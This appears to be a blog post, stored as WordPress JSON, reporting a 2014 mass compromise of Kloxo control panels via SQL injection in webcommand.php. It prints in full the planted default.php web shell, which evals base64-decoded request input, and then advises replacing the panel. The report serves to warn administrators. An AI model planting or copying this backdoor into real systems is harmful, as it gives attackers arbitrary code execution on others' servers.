{"id":55,"date":"2014-01-28T20:58:00","date_gmt":"2014-01-28T20:58:00","guid":{"rendered":"https:\/\/www.tech-and-dev.com\/blog\/2014\/01\/28\/kloxo-compromised-hacked-with-an-sql-injection-vulnerability\/"},"modified":"2021-02-22T01:02:07","modified_gmt":"2021-02-22T01:02:07","slug":"kloxo-compromised-hacked-with-sql-injection-vulnerability","status":"publish","type":"post","link":"https:\/\/www.tech-and-dev.com\/blog\/2014\/01\/kloxo-compromised-hacked-with-sql-injection-vulnerability.html","title":{"rendered":"Kloxo Compromised &#038; Hacked With an SQL Injection Vulnerability"},"content":{"rendered":"<div dir=\"ltr\" style=\"text-align: left;\">\n<div style=\"clear: both; text-align: center;\"><a style=\"margin-left: 1em; margin-right: 1em;\" href=\"https:\/\/www.tech-and-dev.com\/blog\/wp-content\/uploads\/2021\/02\/kloxo-logo.png\"><img loading=\"lazy\" decoding=\"async\" title=\"Kloxo Logo\" src=\"https:\/\/www.tech-and-dev.com\/blog\/wp-content\/uploads\/2021\/02\/kloxo-logo.png\" alt=\"Kloxo Hack\" width=\"320\" height=\"73\" border=\"0\" \/><\/a><\/div>\n<p>&nbsp;<\/p>\n<div style=\"text-align: justify;\">Kloxo is an open source free web hosting platform that helps a server administrator manage their webservers, database servers, DNS servers and much more using a graphical user interface.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">Kloxo is now outdated, and the last issued update was over two years ago.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">After zPanel appeared to be vulnerable last month, it seems that Kloxo, which is another free Control Panel is the today&#8217;s victim.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">According to <a href=\"https:\/\/vpsboard.com\/topic\/3384-kloxo-installations-compromised\/\" target=\"_blank\" rel=\"nofollow noopener\">VPSBoard<\/a>, <b>Kloxo is spawning a huge number of httpd processes and sending out large volumes of traffic as part of a DDOS.<\/b><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">The affected targets are getting their Kloxo installations hacked with SQL Injection through <b>webcommand.php<\/b> file which is granting the attacker Kloxo admin access.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">The attacker is then injecting a file called <b>default.php<\/b> into every Kloxo account through display.php, and changing the owner of the default.php to root.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">The injected default.php contains the following code:<\/div>\n<blockquote>\n<blockquote>\n<div>&lt;?php<\/div>\n<div>set_time_limit(0);error_reporting(NULL);<\/div>\n<div>if(($_REQUEST[&#8216;8ba7afbaaddc67de33a3f&#8217;])!=NULL){eval(base64_decode($_REQUEST[&#8216;8ba7afbaaddc67de33a3f&#8217;]));}<\/div>\n<div>else{echo &#8216;&lt;!DOCTYPE HTML PUBLIC&#8221;-\/\/IETF\/\/DTDHTML 2.0\/\/EN&#8221;&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;\/title&gt;&lt;\/head&gt;&lt;body&gt;Access denied.&lt;\/body &gt;&lt;\/html &gt;&#8217;;}<\/div>\n<div>?&gt;<\/div>\n<\/blockquote>\n<\/blockquote>\n<div style=\"text-align: justify;\">The above code is basically taking an encoded variable that contains a code written by the attacker. The code will be decoded and executed on the server. Just imagine all the fun you can have with someone&#8217;s server if you are able to execute any command you wish.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">As a security measure, it&#8217;s advised to remove your Kloxo Control Panel and replace it by a up to date Panel.<\/div>\n<div style=\"text-align: justify;\"><\/div>\n<div style=\"text-align: justify;\">A good easy to use free control panel that is gaining a lot of popularity lately is: <a href=\"http:\/\/vestacp.com\/\" target=\"_blank\" rel=\"nofollow noopener\">VestaCP<\/a><\/div>\n<div style=\"text-align: justify;\">If you want a more complicated free control panel to manage your virtual hosts and servers, you can always go with <a href=\"http:\/\/webmin.com\/virtualmin.html\" target=\"_blank\" rel=\"nofollow noopener\">Virtualmin<\/a>.<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Kloxo is an open source free web hosting platform that helps a server administrator manage their webservers, database servers, DNS servers and much more using a graphical user interface. Kloxo is now outdated, and the last issued update was over two years ago. After zPanel appeared to be vulnerable last month, it seems that [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[70,6,31],"tags":[],"class_list":["post-55","post","type-post","status-publish","format-standard","hentry","category-kloxo","category-linux","category-server"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/posts\/55","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/comments?post=55"}],"version-history":[{"count":1,"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/posts\/55\/revisions"}],"predecessor-version":[{"id":249,"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/posts\/55\/revisions\/249"}],"wp:attachment":[{"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/media?parent=55"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/categories?post=55"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.tech-and-dev.com\/blog\/wp-json\/wp\/v2\/tags?post=55"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}